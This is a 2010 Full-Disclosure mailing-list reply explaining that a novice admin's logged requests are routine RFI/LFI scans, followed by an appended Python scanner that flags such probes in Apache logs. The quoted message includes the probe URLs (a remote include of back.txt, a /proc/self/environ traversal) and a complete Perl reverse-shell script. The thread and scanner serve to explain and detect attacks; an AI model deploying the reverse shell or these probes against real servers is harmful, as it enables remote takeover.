Date: Sun, 11 Jul 2010 21:39:15 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <mrx@...pergander.org.uk>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Using of the sites for attacks on other sites

Hello Dave!

Soon I'll answer the comments of Chris and Sebastien on this topic, but first
I'll answer your letter. Just one request: next time you respond to the list
about my letter, please send a copy of it to my e-mail, so I'll know about it.

> I have been witnessing such attacks in the past few weeks.

Man, it's another type of attack. In my article, which I talked about in my
letter to the list, I wrote about using Abuse of Functionality
vulnerabilities to attack other sites. So different sites become a tool in
the hands of an attacker to conduct attacks (including DoS and DDoS) on other
sites. I'll soon write additional information about such attacks concerning
my latest research in this topic.

> Most of the urls are trying to exploit components of web software that I
> do not have installed.

In your case we have a different type of attack than described in my article.
And I have seen such attacks for many years - I have had many such attacks
every day (up to a few hundred per day) at my site from July 2006 till now.
It's just people, mostly script kiddies, looking for known vulnerabilities at
the site. And they will not find any of them if your site is secure.

In particular, they are looking for known RFI and LFI vulnerabilities in
different web applications. In the first of your examples you can see that the
attacker was trying to include back.txt from a remote server.

So in all these attacks there are no other sites which were used to attack
your site; it was just scripts which were hosted at different sites
(particularly hacked sites), to be included or downloaded to your server for
execution. So if you don't have such vulnerable webapps at your site, then you
have no need to worry about it.

> I think my server is pretty secure, but I am a novice so what do I really
> know? And as such I have blocked these IP's from accessing my server.

As I said, you have no need to worry about these attacks if you don't have
such vulnerable webapps. And whether to ban these IPs or not is up to you.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: mrx
Subject: Re: [Full-disclosure] Using of the sites for attacks on other sites

> I have been witnessing such attacks in the past few weeks. Most of the
> urls are trying to exploit components of web software that I do not have
> installed. Some do GET existing pages such as index.php and tag the attack
> on the end. Such attacks began about 2 weeks ago. These attacks have
> so far come from three different IP addresses, and I was getting around a
> dozen such accesses every other day. I think my server is pretty
> secure, but I am a novice so what do I really know? And as such I have
> blocked these IPs from accessing my server. FYI, the originating IPs all
> have WordPress blogs on them.
>
> If anyone is interested here is one such attack:
>
> <apache2 log entries>
>
> 88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET
> /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt??
> HTTP/1.1" 404 220 "-" ...
>
> Here is another example:
>
> 94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET
> /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ
> HTTP/1.1" 200 3775 "-" ...
>
> </apache2 log entries>
>
> <cb.txt content>
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
>
> </cb.txt content>
>
> If anyone would like more log entries let me know.
>
> If all this is beneath you guys.... sorry I bothered you.
>
> regards
> Dave

On 28/06/2010 21:13, MustLive wrote:
> Hello participants of Full-Disclosure!
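
A way to pick such RFI/LFI probes out of an Apache access log, as an added example that is not part of the thread. The sample log is constructed: the two requests Dave quoted, re-joined onto single lines, plus one benign request from a documentation address (203.0.113.7).

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample log: the two requests quoted in the thread, re-joined onto
# single lines, plus one benign request (203.0.113.7 is a documentation address).
SAMPLE_LOG = """\
88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt?? HTTP/1.1" 404 220 "-" "-"
94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" "-"
203.0.113.7 - - [21/Jun/2010:05:40:01 +0100] "GET /index.php?page=about HTTP/1.1" 200 1234 "-" "-"
"""

# Apache common/combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)')
# RFI: a parameter value that is itself a URL pointing at another host.
REMOTE_SCHEME = re.compile(r'^(https?|ftps?)://', re.I)
# LFI: directory traversal, the /proc/self/environ trick, or an embedded NUL byte.
TRAVERSAL = re.compile(r'\.\./|\.\.\\|/proc/self/environ|\x00', re.I)


def classify(target):
    """Return (kind, parameter) where kind is 'rfi', 'lfi' or None."""
    query = target.partition('?')[2]
    # parse_qsl percent-decodes values, so %2e%2e/ is seen as ../
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            return 'rfi', name
        if TRAVERSAL.search(value):
            return 'lfi', name
    return None, None


def scan(log_text):
    """Return one record per request that looks like an RFI or LFI probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind, param = classify(m['target'])
        if kind:
            hits.append({'ip': m['ip'], 'kind': kind, 'param': param,
                         'status': int(m['status']), 'target': m['target']})
    return hits


def probes_per_ip(hits):
    """Count probes by source address, the figure Dave used when deciding to block."""
    return Counter(h['ip'] for h in hits)


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"{h['ip']} {h['kind'].upper()} via {h['param']} -> HTTP {h['status']}")
    print(dict(probes_per_ip(found)))
```

A 200 on the /proc/self/environ probe only says index.php answered; whether anything was actually included can only be judged from the response body, which the access log does not carry.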


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/